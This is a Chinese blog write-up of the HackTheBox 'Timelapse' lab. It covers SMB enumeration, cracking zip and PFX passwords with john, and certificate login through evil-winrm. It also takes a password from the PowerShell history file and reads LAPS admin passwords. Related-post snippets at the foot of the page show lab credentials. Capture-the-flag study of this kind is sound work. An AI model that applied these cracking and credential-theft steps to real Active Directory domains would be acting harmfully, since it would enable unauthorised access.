HTB-Timelapse

最新推荐文章于 2025-01-09 20:08:08 发布
最新推荐文章于 2025-01-09 20:08:08 发布
阅读量1k 收藏 12
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75378806/article/details/139030428
版权

NMAP的端口枚举

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ','

53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49688,4969

5

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd

',')

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ echo $ports

53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49688,4969

5

smb

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ smbmap -H 10.129.82.223 -u guest -R

smbclient -L //dc01.timelapse.htb

smbclient //dc01.timelapse.htb/IPC$

smb里NETLOGON和SYSVOL⼀般是域控制器(DC)的标准配置

LAPS

Windows本地管理员密码解决⽅案(Windows LAPS,Windows Local Administrator Password

Solution)是Windows的⼀个功能,它可以⾃动管理和备份Azure Active Directory加⼊或Windows

Server Active Directory加⼊设备上本地管理员账户的密码。您还可以使⽤Windows LAPS⾃动管理和备份Windows Server Active Directory域控制器上的⽬录服务还原模式(DSRM)账户密码。授权管理员

可以检索DSRM密码并使⽤它。

zip破解

unzip -l winrm_backup.zip 可以罗列里面的内容

zip2john winrm_backup.zip > winrm_backup.zip.hash

john winrm_backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

解压后有pfx

pfx

这三篇⽂章都会给你讲解pfx⽂件及其敏感⽂件提取⽅式:

\1. Understanding PFX File with Examples - howtouselinux 很简洁准确

\2. Extracting the certificate and keys from a .pfx file - IBM Documentation:

IBM Documentation

\3. PFX证书导出公钥和私钥 pfx 证书导出公钥和私钥「建议收藏」-腾讯云开发者社区-腾讯云?

from=article.detail.1971129&areaSource=106000.18&traceId=c_TFRJePnTf1bdA4Igqsm

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key

但是需要密码

尝试破解

pfx2john legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash

john legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt

成功得到密码

提取密钥

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc

输入密码后,要输入PEM pass phrase随便设置,我设置为1234

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ ls legacyy_dev_auth.key

legacyy_dev_auth.key-enc

⽤刚设置的密码解密密钥

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key

Enter pass phrase for legacyy_dev_auth.key-enc:

writing RSA key

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ ls legacyy_dev_auth.*

legacyy_dev_auth.key legacyy_dev_auth.key-enc legacyy_dev_auth.pfx

legacyy_dev_auth.pfx.hash

其实openssl rsa的破解不破解也是也可以的。

提取证书

──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -outlegacyy_dev_auth.crt

Enter Import Password:

两个⽂件都已经成功获取:

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ ls legacyy_dev_auth.*

legacyy_dev_auth.crt legacyy_dev_auth.key legacyy_dev_auth.key-enc

legacyy_dev_auth.pfx legacyy_dev_auth.pfx.hash

evil-winrm证书横向

获得系统初始⽴⾜点,注意使⽤证书登录通常需要启⽤SSL(Secure Sockets Layer)加密,即给定-S

选项。证书连接⽅式和5986端⼝(⽽不是5985)都有-S的需求。

┌──(kali㉿kali)-[~/…/RedteamNotes/BoxWalk/HackTheBox/Timelapse]

└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt

提权

枚举历史命令(在这个文件下)

type

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHo

st_history.txt

获得另外一个用户密码

LAPS

属LAPS_Readers组。可以读取LAPS。

使⽤LAPS(Local Administrator Password Solution),域控制器可以管理域中计算机的本地管理员密

码。通常会创建⼀个⽤户组,并赋予其读取这些密码的权限,从⽽允许可信管理员访问所有本地管理员

密码。

要读取LAPS(本地管理员密码解决⽅案)密码,只需要使⽤Get-ADComputer命令,并明确请求ms

mcs-admpwd属性即可:

Evil-WinRM PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms

mcs-admpwd'

kikifofo
关注
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8615
HTB Cerberus hard!!!靶机writeUp
timelapse:游戏中时光倒流视图
05-02
HG的间隔拍摄视图 下载 您可以下载最新的预构建版本: Windows(〜780 kb) : : 特征 在时间浏览的视图中显示所有文件修订版(专为 Mercurial存储库设计) 将所有文件修订基于共同的祖先,并进行清晰地整理。 显示常见和有用的信息: 您想查看diff补丁吗? 您可以使用键盘快捷键快速浏览修订版本: 独立的轻量级可执行文件(小于1 mb ) 重用同一个实例来延时其他回购文件: 重订一个共同的祖先所有版本可以是一个漫长的过程( hg是缓慢的地狱!),所以我们让用户知道如何注释获取和修改基础重建进展: 支持各种外部工具以与当前版本一起使用; 例如打开beycond比较作为文件夹比较视图或打开各种thg工具: 使用简单的lis视图显示文件更改集 在后台线程中启动多个hg进程以保持UI响应。 使用 UI的ocornut / imgui https://
HTBTimelapse[WriteUP]
如有错误感谢斧正
01-09 1028
PFX 是 Personal Information Exchange 的缩写,PFX 文件是一种二进制格式的文件,用于存储数字证书及其关联的私钥,还可能包含证书链信息。它将公钥证书和私钥捆绑在一起,通常用于在不同的系统和应用程序之间传输证书和密钥信息,以便进行安全通信、身份验证和加密操作。密码:E3R$Q62^12p7PLlC%KWaxuaV。靶机IP:10.10.11.152。分配IP:10.10.16.13。账户:svc_deploy。
Timelapse
weixin_45007073的博客
04-02 9587
信息收集 做信息收集的时候,发现是一台内网靶机,开放了很多内网相关的端口。我们也发现了一个域名timelapse.htb,我们可以添加到hosts文件中 目标开放了SMB服务,我们尝试是否可以匿名登录SMB服务。发现可以匿名登录,Shares目录可以进行读取 smbmap -u guest -p "" -H 10.10.11.152 然后我们尝试匿名登录到这个目录上,看到存在一个备份文件压缩包。我们将其下载下来进行进一步分析 smbclient \\\\10.10.11.152\\Shares -U
indi-timelapse
03-28
indi-timelapse
Hack The Box-Timelapse
qq_49354488的博客
07-04 420
学的是思路而不是盲目的刷题
【Hack The Box】windows练习-- Timelapse
人间体佐菲的博客
11-18 428
【Hack The Box】windows练习-- Timelapse
2024年最新HTB靶机渗透之headless(linux-easy)_headless htb(1),2024年最新斗鱼Linux运维开发二面被刷
m0_61943758的博客
05-04 1108
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以点击这里获取!一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!执行命令后等待了很久有了如下结果 结果很长,总结一下:开放了22和5000端口,22端口自然是openssh,但5000端口这个协议不常见啊,查了一下upnp协
dev-timelapse:创建项目创建过程中的时间流逝
04-29
npm install dev-timelapse -g 用法 dev-timelapse http://localhost:3000 或使用npx npx dev-timelapse http://localhost:3000 选项 选项 别名 描述 - 每一个 -e 屏幕截图之间的间隔 - 小路 -p 屏幕截图的...
timelapse:用于捕获和编译缩时摄影的Shell脚本
05-20
用于捕获和编译缩时摄影的Shell脚本,如下所示: 要求 软件 (可选) 硬件 具有实时JPG照片URL的iPhone或网络摄像头 因为我的手机是我拥有的最好的相机,所以我会同时使用它和应用程序。 其未记录的照片URL路径为/photo 。 为了使它处于正确的身体位置,我有一个。 脾气暴躁! 安装 对于带有Mac: brew install ffmpeg brew install gifsicle brew install imagemagick 用法 首先通过将URL传递给capture.sh来运行它: ./capture.sh -u http://127.0.0.1:8080/capture 该脚本将永远运行,因此在要退出时按ctrl+c 。 接下来,运行compile.sh : ./compile.sh 这样会将MP4视频和无数较小的GIF放在output文件夹中。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络上的人际交往.ppt
05-31
网络上的人际交往.ppt
利用Revit软件进行智能检查管线净高的方法.docx
06-01
利用Revit软件进行智能检查管线净高的方法.docx
MATLAB环境下PSS仿真模型电力系统振荡模式测试研究
06-01
《基于MATLAB的PSS仿真模型的电力系统振荡模式测试研究》是我的毕业论文课题。经过几个星期的辛勤搭建与调试,我终于完成了这个模型,现在我已经顺利毕业啦。这个模型是基于MATLAB 7.1版本开发的。希望它能够为大家提供便利。对了,我是南工程的,不知道学弟学妹们有没有看到这篇帖子,希望它能对你们有所帮助,哈哈。
基于卷积神经网络的调制信号识别算法
05-31
In this study, we explore the cutting-edge developments in machine learning using deep neural networks, specifically applying them to the task of radio modulation recognition. Utilizing the Keras framework with TensorFlow as the backend and the GitHub universal dataset, our research demonstrates that the performance of radio modulation recognition is not constrained by the depth of the neural network. Instead, future efforts should concentrate on enhancing the synchronization and equalization capabilities learned by the models. Breakthroughs in these areas are expected to arise from either innovative neural network architectures tailored for these tasks or through the development of novel training techniques.
ultralytics-yolo11通过X光图像识别骨折位置和类型-为临床治疗提供参考+数据集+训练好的模型.zip
最新发布
06-01
ultralytics-yolo11通过X光图像识别骨折位置和类型-为临床治疗提供参考+数据集+训练好的模型,包含有使用教程 1. 内部包含标注好的目标检测数据集,分别有yolo格式(txt文件)和voc格式标签(xml文件), 共458张图像, 已划分好数据集train,val, test,并附有data.yaml文件可直接用于yolov5,v8,v9,v10,v11,v12等算法的训练; 2. yolo目标检测数据集类别名:bone-fracture(骨折),包括 angle(角度)、fracture(骨折)、line(线条)、messed_up_angle(混乱角度)等 3. yolo项目用途:通过X光图像识别骨折位置和类型,为临床治疗提供参考 4. 可视化参考链接:https://blog.youkuaiyun.com/weixin_51154380/article/details/126395695?spm=1001.2014.3001.5502
基于java开发的水质监测与预测系统+源码(毕业设计&课程设计&项目开发)
06-01
基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用
会计电算化第六章EXCEL在总账处理中应用.ppt
05-31
会计电算化第六章EXCEL在总账处理中应用.ppt
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
04-08
在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值